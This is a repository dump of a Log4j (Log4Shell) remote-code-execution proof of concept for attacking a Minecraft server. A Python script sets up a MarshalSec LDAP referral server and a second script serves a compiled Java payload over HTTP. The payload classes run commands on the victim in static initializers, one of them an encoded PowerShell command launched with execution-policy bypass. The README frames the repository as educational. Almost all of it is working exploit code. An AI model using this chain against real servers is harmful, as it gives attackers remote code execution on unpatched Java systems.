├── jcomp_pyserv.py ├── poc ├── Log4jRCE_calc.java ├── Log4jRCE_notepad.java └── Log4jRCE.java ├── README.md └── log4j.py /jcomp_pyserv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import subprocess 4 | import os 5 | 6 | #1. Change Directory to ./poc 7 | os.chdir("./poc/") 8 | #2. Compile Java file to Java Class. 9 | subprocess.run(["javac", "Log4jRCE.java"]) 10 | #3. Start python3 http server 11 | subprocess.run(["python3", "-m", "http.server", "8888"]) 12 | 13 | -------------------------------------------------------------------------------- /poc/Log4jRCE_calc.java: -------------------------------------------------------------------------------- 1 | public class Log4jRCE { 2 | 3 | static { 4 | 5 | try { 6 | java.lang.Runtime.getRuntime().exec("calc.exe").waitFor(); 7 | } catch (Exception e) { 8 | e.printStackTrace(); 9 | } 10 | } 11 | 12 | public Log4jRCE(){ 13 | System.out.println("I am Log4jRCE from remote222!!!"); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /poc/Log4jRCE_notepad.java: -------------------------------------------------------------------------------- 1 | public class Log4jRCE { 2 | 3 | static { 4 | 5 | try { 6 | java.lang.Runtime.getRuntime().exec("notepad.exe").waitFor(); 7 | } catch (Exception e) { 8 | e.printStackTrace(); 9 | } 10 | } 11 | 12 | public Log4jRCE(){ 13 | System.out.println("I am Log4jRCE from remote222!!!"); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /poc/Log4jRCE.java: -------------------------------------------------------------------------------- 1 | public class Log4jRCE { 2 | 3 | static { 4 | 5 | try { 6 | java.lang.Runtime.getRuntime().exec("powershell.exe -exec bypass -enc cwB0AGEAcgB0ACAAYwBoAHIAbwBtAGUAIABoAHQAdABwAHMAOgAvAC8AeQBvAHUAdAB1AC4AYgBlAC8AZABRAHcANAB3ADkAVwBnAFgAYwBRACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABtAGEAeABpAG0AaQB6AGUAZAANAAoA").waitFor(); 7 | } catch (Exception e) { 8 | e.printStackTrace(); 9 | } 10 | } 11 | 12 | public Log4jRCE(){ 13 | System.out.println("I am Log4jRCE from remote222!!!"); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # log4jminecraft 2 | This code *DOES NOT* promote or encourage any illegal activities! 3 | The content in this document is provided solely for educational purposes and to create awareness! 4 | 5 | Watch a video showing the process here: https://youtu.be/efnluUK_w_U 6 | 7 | This PDF shows you how to setup a Minecraft server for this demonstration: https://davidbombal.wiki/minecraftw11log4j 8 | 9 | To run this project follow the following steps: 10 | 1. Clone the repository: 11 | ```git clone https://github.com/davidbombal/log4jminecraft.git``` 12 | 3. Run the script log4j.py (```python3 log4j.py ``` i.e. ```python3 log4j.py 192.168.1.132```). This installs the prerequisite software, and also starts up the LDAP server. 13 | 4. Run the script jcomp_pyserv.py (```python3 jcomp_pyserv.py```). This compiles the Java payload to be ran, and also starts a python3 http.server. 14 | 15 | # Acknowledgement for contributions: 16 | * John Hammond : https://youtu.be/7qoPDq41xhQ 17 | * Moritz Bechler (For creating the Java Unmarshaller Security - MarshalSec) : https://github.com/mbechler/marshalsec 18 | * xiajun325 for clear instruction on how to use the MarshalSec tool : https://github.com/xiajun325/apache-log4j-rce-poc 19 | -------------------------------------------------------------------------------- /log4j.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # Run program using the following syntax: python3 log4j.py . 4 | # IP address above should be the one you get when running command: ip a s eth0 5 | 6 | # Install JDK and all software required. 7 | 8 | import subprocess 9 | from os import path 10 | import os 11 | import sys 12 | from ipaddress import IPv4Address 13 | 14 | 15 | #1. Please specify ip address of this Kali machine as an argv. 16 | try: 17 | # If IPv4Network(3rd paramater is not a valid ip range, then will kick you to the except block.) 18 | print(f"{IPv4Address(sys.argv[1])}") 19 | # If it is valid it will assign the ip_range from the 3rd parameter. 20 | ip_addr = sys.argv[1] 21 | print("Valid ip address entered through command-line.") 22 | except: 23 | print("Run program with command-line argument for ip address. Please re-run the program. Example would be python3 log4j.py 192.168.1.132") 24 | exit() 25 | 26 | #2. Update Kali 27 | print("**Updating Kali!**\n") 28 | subprocess.run(["sudo", "apt", "update"]) 29 | 30 | #3. Install Maven 31 | # Check if Maven is installed 32 | try: 33 | mvn_check = subprocess.run(["mvn", "--version"], capture_output=True) 34 | print("\n**Apache Maven already installed! Continuing!\n**") 35 | except: 36 | print("\n**Installing Maven!**\n") 37 | subprocess.run(["sudo", "apt", "install", "maven"]) 38 | 39 | #4. Download JDK-8u181 40 | # Check if the correct JDK is installed 41 | print("\nChecking JDK Version\n") 42 | try: 43 | jdk_check = subprocess.run(["javac", "-version"], capture_output=True) 44 | # Check if JDK is installed. The output shows up in the stderr instead of the stdout for some reason. 45 | print("\n**JDK already installed! Continuing!\n**") 46 | except: 47 | # Download the correct version of the JDK. 48 | print("\n**Downloading JDK**\n") 49 | subprocess.run(["wget", "https://repo.huaweicloud.com/java/jdk/8u181-b13/jdk-8u181-linux-x64.tar.gz"]) 50 | # Different repository usually a bit slow. 51 | #subprocess.run(["wget", "http://mirrors.rootpei.com/jdk/jdk-8u181-linux-x64.tar.gz"]) 52 | 53 | #5. Install JDK 54 | # Check if directory /opt/jdk exists. 55 | if path.exists("/opt/jdk"): 56 | print("/opt/jdk already exists. Will now continue to extract.") 57 | else: 58 | subprocess.run(["sudo", "mkdir", "/opt/jdk"]) 59 | subprocess.run(["sudo", "tar", "-zxf", "jdk-8u181-linux-x64.tar.gz", "-C", "/opt/jdk"]) 60 | subprocess.run(["sudo", "update-alternatives", "--install", "/usr/bin/java", "java", "/opt/jdk/jdk1.8.0_181/bin/java", "100"]) 61 | subprocess.run(["sudo", "update-alternatives", "--install", "/usr/bin/javac", "javac", "/opt/jdk/jdk1.8.0_181/bin/javac", "100"]) 62 | subprocess.run(["sudo", "update-alternatives", "--display", "java"]) 63 | subprocess.run(["sudo", "update-alternatives", "--display", "javac"]) 64 | subprocess.run(["sudo", "update-alternatives", "--set", "/opt/jdk/jdk1.8.0_181/bin/java"]) 65 | subprocess.run(["java", "-version"]) 66 | 67 | #6. Get MarshalSec repo 68 | subprocess.run(["git", "clone", "https://github.com/mbechler/marshalsec.git"]) 69 | 70 | #7. Change directory 71 | cwd = os.getcwd() 72 | os.chdir("./marshalsec/") 73 | print(os.listdir()) 74 | subprocess.run(["mvn", "clean", "package", "-DskipTests"]) 75 | 76 | #8. Run LDAP server. In terminal you need to add "" around the ip address. In subprocess.run this is not required. 77 | try: 78 | subprocess.run(["java", "-cp", "target/marshalsec-0.0.3-SNAPSHOT-all.jar", "marshalsec.jndi.LDAPRefServer", f"http://{ip_addr}:8888/#Log4jRCE"]) 79 | except: 80 | print("Something went wrong. Please check that you have the correct ip address") 81 | 82 | # We want to thank the following people for their contribution: 83 | # John Hammond : https://youtu.be/7qoPDq41xhQ 84 | # Moritz Bechler (For creating the Java Unmarshaller Security - MarshalSec) : https://github.com/mbechler/marshalsec 85 | # xiajun325 for clear instruction on how to use the MarshalSec tool : https://github.com/xiajun325/apache-log4j-rce-poc --------------------------------------------------------------------------------